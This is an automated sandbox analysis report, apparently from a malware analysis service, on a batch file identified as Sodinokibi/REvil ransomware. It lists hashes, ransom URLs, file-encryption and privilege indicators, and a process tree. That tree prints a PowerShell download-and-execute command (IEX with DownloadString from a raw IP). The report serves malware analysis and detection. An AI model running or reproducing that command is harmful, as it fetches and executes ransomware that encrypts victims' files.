Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
03-09-2020 19:10
Static task
static1
Behavioral task
behavioral1
Sample
01619b049472811b76565ddd589bc9eb.bat
Resource
win7v200722
Behavioral task
behavioral2
Sample
01619b049472811b76565ddd589bc9eb.bat
Resource
win10v200722
General
-
Target
01619b049472811b76565ddd589bc9eb.bat
-
Size
221B
-
MD5
3ab48b49f0f231c470e42900d1a7e59f
-
SHA1
a25a30cfa56bd61d0484e2a37fd86fb365edf99a
-
SHA256
d58ef2af3b2f9387c21e0e0b5b81594a995dc4a09e8befa0f0d95700bc9a342c
-
SHA512
f6a7e33125726389dd01e7cfcce2286050cc48d56b465c719f8d5bfe6facef0fbf83ad47111c52ecd3d67f090e394dfaa842013f71b9b7d81f2c0e8c4e9ab4e5
Malware Config
Extracted
http://185.103.242.78/pastes/01619b049472811b76565ddd589bc9eb
Extracted
C:\m6h3sco-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/DFAA79F45525AB35
http://decryptor.cc/DFAA79F45525AB35
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Blacklisted process makes network request 112 IoCs
Processes:
powershell.exeflow pid process 13 392 powershell.exe 26 392 powershell.exe 27 392 powershell.exe 28 392 powershell.exe 29 392 powershell.exe 31 392 powershell.exe 33 392 powershell.exe 35 392 powershell.exe 37 392 powershell.exe 39 392 powershell.exe 41 392 powershell.exe 43 392 powershell.exe 45 392 powershell.exe 47 392 powershell.exe 48 392 powershell.exe 50 392 powershell.exe 52 392 powershell.exe 54 392 powershell.exe 56 392 powershell.exe 58 392 powershell.exe 60 392 powershell.exe 62 392 powershell.exe 64 392 powershell.exe 66 392 powershell.exe 68 392 powershell.exe 70 392 powershell.exe 72 392 powershell.exe 74 392 powershell.exe 76 392 powershell.exe 78 392 powershell.exe 80 392 powershell.exe 82 392 powershell.exe 84 392 powershell.exe 86 392 powershell.exe 88 392 powershell.exe 90 392 powershell.exe 92 392 powershell.exe 94 392 powershell.exe 96 392 powershell.exe 98 392 powershell.exe 100 392 powershell.exe 103 392 powershell.exe 105 392 powershell.exe 107 392 powershell.exe 109 392 powershell.exe 111 392 powershell.exe 113 392 powershell.exe 115 392 powershell.exe 117 392 powershell.exe 119 392 powershell.exe 121 392 powershell.exe 123 392 powershell.exe 125 392 powershell.exe 127 392 powershell.exe 129 392 powershell.exe 131 392 powershell.exe 133 392 powershell.exe 135 392 powershell.exe 137 392 powershell.exe 139 392 powershell.exe 141 392 powershell.exe 143 392 powershell.exe 145 392 powershell.exe 147 392 powershell.exe -
Modifies extensions of user files 4 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
powershell.exedescription ioc process File renamed C:\Users\Admin\Pictures\BackupStop.png => \??\c:\users\admin\pictures\BackupStop.png.m6h3sco powershell.exe File renamed C:\Users\Admin\Pictures\DenyCheckpoint.tif => \??\c:\users\admin\pictures\DenyCheckpoint.tif.m6h3sco powershell.exe File renamed C:\Users\Admin\Pictures\ReceiveGet.tif => \??\c:\users\admin\pictures\ReceiveGet.tif.m6h3sco powershell.exe File renamed C:\Users\Admin\Pictures\UseUnpublish.tif => \??\c:\users\admin\pictures\UseUnpublish.tif.m6h3sco powershell.exe -
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 5 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\b19rlft138vf5.bmp" powershell.exe -
Drops file in Program Files directory 33 IoCs
Processes:
powershell.exedescription ioc process File created \??\c:\program files (x86)\m6h3sco-readme.txt powershell.exe File opened for modification \??\c:\program files\ResizeUnregister.wmx powershell.exe File opened for modification \??\c:\program files\RestartResize.jpeg powershell.exe File opened for modification \??\c:\program files\SubmitSend.raw powershell.exe File created \??\c:\program files\m6h3sco-readme.txt powershell.exe File opened for modification \??\c:\program files\OptimizeRequest.wvx powershell.exe File opened for modification \??\c:\program files\SelectPublish.mpp powershell.exe File opened for modification \??\c:\program files\UndoApprove.rtf powershell.exe File opened for modification \??\c:\program files\InitializeMeasure.wav powershell.exe File opened for modification \??\c:\program files\RestartConvert.dot powershell.exe File opened for modification \??\c:\program files\SendRead.pptx powershell.exe File opened for modification \??\c:\program files\UseCopy.emz powershell.exe File opened for modification \??\c:\program files\ResetUpdate.wma powershell.exe File opened for modification \??\c:\program files\ResizeEnter.pcx powershell.exe File opened for modification \??\c:\program files\ClearFind.mov powershell.exe File opened for modification \??\c:\program files\ConvertSplit.sql powershell.exe File opened for modification \??\c:\program files\ExpandTrace.mov powershell.exe File opened for modification \??\c:\program files\NewCheckpoint.vssx powershell.exe File opened for modification \??\c:\program files\OptimizeUpdate.edrwx powershell.exe File opened for modification \??\c:\program files\WatchConnect.emf powershell.exe File opened for modification \??\c:\program files\CloseMerge.avi powershell.exe File opened for modification \??\c:\program files\DebugJoin.css powershell.exe File opened for modification \??\c:\program files\FindTrace.rmi powershell.exe File opened for modification \??\c:\program files\ReceiveStart.vdw powershell.exe File opened for modification \??\c:\program files\WaitSwitch.png powershell.exe File opened for modification \??\c:\program files\SuspendMerge.midi powershell.exe File opened for modification \??\c:\program files\EnterOut.xml powershell.exe File opened for modification \??\c:\program files\ImportTest.ps1xml powershell.exe File opened for modification \??\c:\program files\InstallUpdate.wps powershell.exe File opened for modification \??\c:\program files\LimitComplete.xml powershell.exe File opened for modification \??\c:\program files\RequestEnable.js powershell.exe File opened for modification \??\c:\program files\InitializeRepair.DVR powershell.exe File opened for modification \??\c:\program files\SendUpdate.wmf powershell.exe -
Drops file in Windows directory 1 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Windows\ServiceProfiles\LocalService\winhttp\cachev3.dat svchost.exe -
Modifies data under HKEY_USERS 5 IoCs
Processes:
svchost.exedescription ioc process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7 svchost.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecisionReason = "1" svchost.exe Set value (data) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecisionTime = 782752393682d601 svchost.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecision = "0" svchost.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad svchost.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepid process 392 powershell.exe 392 powershell.exe 392 powershell.exe 392 powershell.exe 392 powershell.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
Processes:
svchost.exepowershell.exevssvc.exedescription pid process Token: SeShutdownPrivilege 2236 svchost.exe Token: SeCreatePagefilePrivilege 2236 svchost.exe Token: SeDebugPrivilege 392 powershell.exe Token: SeDebugPrivilege 392 powershell.exe Token: SeTakeOwnershipPrivilege 392 powershell.exe Token: SeBackupPrivilege 3748 vssvc.exe Token: SeRestorePrivilege 3748 vssvc.exe Token: SeAuditPrivilege 3748 vssvc.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 3952 wrote to memory of 392 3952 cmd.exe powershell.exe PID 3952 wrote to memory of 392 3952 cmd.exe powershell.exe PID 3952 wrote to memory of 392 3952 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\01619b049472811b76565ddd589bc9eb.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3952 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/01619b049472811b76565ddd589bc9eb');Invoke-BSCFPHAYQBPUGG;Start-Sleep -s 10000"2⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:392
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2236
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:3748